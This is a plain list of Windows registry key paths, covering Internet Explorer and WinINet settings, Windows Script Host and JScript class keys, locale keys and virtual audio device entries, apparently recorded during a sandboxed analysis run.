HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_EXCLUDE_INVALID_CLIENT_CERT_KB929477
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_UTF8_FOR_BASIC_AUTH_KB967545
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_USE_UTF8_FOR_BASIC_AUTH_KB967545
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_RETURN_FAILED_CONNECT_CONTENT_KB942615
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_RETURN_FAILED_CONNECT_CONTENT_KB942615
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PRESERVE_SPACES_IN_FILENAMES_KB952730
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_PRESERVE_SPACES_IN_FILENAMES_KB952730
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_PROXY_CACHE_REFRESH_KB2983228
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ENABLE_PROXY_CACHE_REFRESH_KB2983228
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\FromCacheTimeout
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SecureProtocols
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SecureProtocols
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SecureProtocols
HKEY_LOCAL_MACHINE\Software\Policies
HKEY_CURRENT_USER\Software\Policies
HKEY_CURRENT_USER\Software
HKEY_LOCAL_MACHINE\Software
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CertificateRevocation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableKeepAlive
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IdnEnabled
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\PreConnectLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\PreResolveLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SqmHttpStreamRandomUploadPoolSize
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CacheMode
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttp1_1
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttp1_1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttp1_1
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableBasicOverClearChannel
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ClientAuthBuiltInUI
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableAutoProxyResultCache
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\DisplayScriptDownloadFailureUI
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\MBCSServername
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\UTF8ServerNameRes
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableReadRange
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SocketSendBufferLength
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SocketReceiveBufferLength
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\KeepAliveTimeout
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxHttpRedirects
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerServer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerServer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPer1_0Server
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPer1_0Server
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerProxy
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ServerInfoTimeout
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectTimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectTimeOut
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectRetries
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectRetries
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SendTimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\SendTimeOut
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ReceiveTimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ReceiveTimeOut
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableNTLMPreAuth
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ScavengeCacheLowerBound
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CertCacheNoValidate
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ScavengeCacheFileLifeTime
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ScavengeCacheFileLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ScavengeCacheFileLimit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ScavengeCacheFileLimit
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISABLE_NOTIFY_UNVERIFIED_SPN_KB2385266
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_NOTIFY_UNVERIFIED_SPN_KB2385266
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_COMPAT_USE_CONNECTION_BASED_NEGOTIATE_AUTH_KB2151543
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_COMPAT_USE_CONNECTION_BASED_NEGOTIATE_AUTH_KB2151543
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\HttpDefaultExpiryTimeSecs
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\FtpDefaultExpiryTimeSecs
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableCachingOfSSLPages
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\LeashLegacyCookies
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DialupUseLanSettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\DialupUseLanSettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SendExtraCRLF
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WpadSearchAllDomains
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\BypassHTTPNoCacheCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\BypassHTTPNoCacheCheck
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\BypassSSLNoCacheCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\BypassSSLNoCacheCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttpTrace
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\NoCheckAutodialOverRide
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\NoCheckAutodialOverRide
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SCH_SEND_AUX_RECORD_KB_2618444
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_SCH_SEND_AUX_RECORD_KB_2618444
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DontUseDNSLoadBalancing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\DontUseDNSLoadBalancing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ShareCredsWithWinHttp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MimeExclusionListForCache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\HeaderExclusionListForCache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DnsCacheEnabled
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DnsCacheEntries
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DnsCacheTimeout
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnPost
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnAlwaysOnPost
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnZoneCrossing
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnBadCertRecving
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnPostRedirect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AlwaysDrainOnRedirect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnHTTPSToHTTPRedirect
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\TcpAutotuning
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ProxySettingsPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableLegacyAutoProxyFeatures
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\BadProxyExpiresTime
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FrameTabWindow
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FrameTabWindow
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FrameMerging
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FrameMerging
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\SessionMerging
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\SessionMerging
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\AdminTabProcs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\AdminTabProcs
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Main
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Main
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\TabProcGrowth
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\TabProcGrowth
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoProxyDetectType
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadOverride
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\DisableBranchCache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\UseFirstAvailable
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CombineFalseStartData
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableFalseStartBlocklist
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnforceP3PValidity
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DuoProtocols
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableSpdyDebugAsserts
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
HKEY_LOCAL_MACHINE\System\Setup
HKEY_LOCAL_MACHINE\SYSTEM\Setup\SystemSetupInProgress
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-US
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-US
HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script Host\Settings\IgnoreUserSettings
HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings\Enabled
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script Host\Settings\Enabled
HKEY_CURRENT_USER\Software\Classes
HKEY_CURRENT_USER\Software\Classes\AppID\wscript.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings\LogSecuritySuccesses
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script Host\Settings\LogSecuritySuccesses
HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings\TrustPolicy
HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings\UseWINSAFER
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script Host\Settings\TrustPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script Host\Settings\UseWINSAFER
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script Host\Settings\Timeout
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script Host\Settings\DisplayLogo
HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings\Timeout
HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings\DisplayLogo
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\WMR
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Sorting\Versions\00060101.00060101
HKEY_CLASSES_ROOT\.js
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.js\(Default)
HKEY_CLASSES_ROOT\JSFile\ScriptEngine
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\JSFile\ScriptEngine\(Default)
HKEY_CURRENT_USER\Software\Classes\JScript
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\JScript\CLSID
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\JScript\CLSID\(Default)
HKEY_LOCAL_MACHINE\Software\Microsoft\COM3
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3\COM+Enabled
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale\Alternate Sorts
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Language Groups
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000409
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot\Option
HKEY_CURRENT_USER\Software\Classes\Interface\{00000134-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\Software\Microsoft\Rpc\Extensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\RemoteRpcDll
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BFE
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledProcesses\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\DA0C75D6
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledSessions\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\MachineThrottling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\GlobalSession
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001\4&39B8AF29&0&0001
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001\4&39b8af29&0&0001\DeviceDesc
HKEY_USERS\S-1-5-21-2476309959-3960023044-3115063449-1000
HKEY_USERS\S-1-5-21-2476309959-3960023044-3115063449-1000\Control Panel\International
HKEY_USERS\S-1-5-21-2476309959-3960023044-3115063449-1000\Control Panel\International\LocaleName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001\4&39b8af29&0&0001\Properties
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001\4&39b8af29&0&0001\Properties\{b3f8fa53-0004-438e-9003-51a46e139bfc}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001\4&39b8af29&0&0001\Properties\{b3f8fa53-0004-438e-9003-51a46e139bfc}\00000007
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001\4&39b8af29&0&0001\Properties\{b3f8fa53-0004-438e-9003-51a46e139bfc}\00000007\00000000
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001\4&39b8af29&0&0001\Properties\{b3f8fa53-0004-438e-9003-51a46e139bfc}\00000007\00000000\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001\4&39b8af29&0&0001\Properties\{b3f8fa53-0004-438e-9003-51a46e139bfc}\00000007\00000000\Data
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994ad04-93ef-11d0-a3cc-00a0c9223196}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#hdaudio#func_01&ven_1af4&dev_0022&subsys_1af40022&rev_1001#4&39b8af29&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#elineoutwave
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#hdaudio#func_01&ven_1af4&dev_0022&subsys_1af40022&rev_1001#4&39b8af29&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39B8AF29&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\DeviceInstance
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39B8AF29&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eLineOutWave\Control
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39B8AF29&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eLineOutWave\Control\Linked
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\Properties
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{eb115ffc-10c8-4964-831d-6dcb02e6f23f}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{EB115FFC-10C8-4964-831D-6DCB02E6F23F}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39b8af29&0&0001#{eb115ffc-10c8-4964-831d-6dcb02e6f23f}\#elineoutwave
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{EB115FFC-10C8-4964-831D-6DCB02E6F23F}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39b8af29&0&0001#{eb115ffc-10c8-4964-831d-6dcb02e6f23f}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{EB115FFC-10C8-4964-831D-6DCB02E6F23F}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39B8AF29&0&0001#{eb115ffc-10c8-4964-831d-6dcb02e6f23f}\DeviceInstance
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{EB115FFC-10C8-4964-831D-6DCB02E6F23F}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39B8AF29&0&0001#{eb115ffc-10c8-4964-831d-6dcb02e6f23f}\#eLineOutWave\Control
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{EB115FFC-10C8-4964-831D-6DCB02E6F23F}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39B8AF29&0&0001#{eb115ffc-10c8-4964-831d-6dcb02e6f23f}\#eLineOutWave\Control\Linked
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{EB115FFC-10C8-4964-831D-6DCB02E6F23F}\Properties
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#hdaudio#func_01&ven_1af4&dev_0022&subsys_1af40022&rev_1001#4&39b8af29&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#elineouttopo
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39B8AF29&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eLineOutTopo\Control
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39B8AF29&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eLineOutTopo\Control\Linked
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39b8af29&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eLineInTopo
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39b8af29&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39b8af29&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eLineInWave
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39b8af29&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eLineOutTopo
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39b8af29&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eLineOutWave
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001\4&39b8af29&0&0001\Capabilities
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001\4&39b8af29&0&0001\ConfigFlags
